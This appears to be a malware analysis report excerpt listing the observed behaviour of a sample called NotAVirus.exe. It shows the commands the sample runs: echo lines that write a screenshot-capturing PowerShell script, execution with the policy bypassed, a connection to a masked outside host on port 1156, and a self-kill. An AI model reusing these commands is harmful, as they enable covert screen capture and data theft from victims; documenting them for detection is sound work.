Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /f /im NotAVirus.exe
- <Current directory>\ps.ps1
- <Current directory>\screenshot.bmp
- 'se##eo.net':1156
- DNS ASK se##eo.net
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c cmd.exe /c echo $outputFile = "screenshot.bmp" > ps.ps1 & echo Add-Type -AssemblyName System.Windows.Forms >> ps.ps1 & echo Add-type -AssemblyName System.Drawing >> ps.ps1 & echo $Screen = [...
- '%WINDIR%\syswow64\cmd.exe' /c echo $outputFile = "screenshot.bmp"
- '%WINDIR%\syswow64\cmd.exe' /c start /b /min cmd.exe /c powershell -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im NotAVirus.exe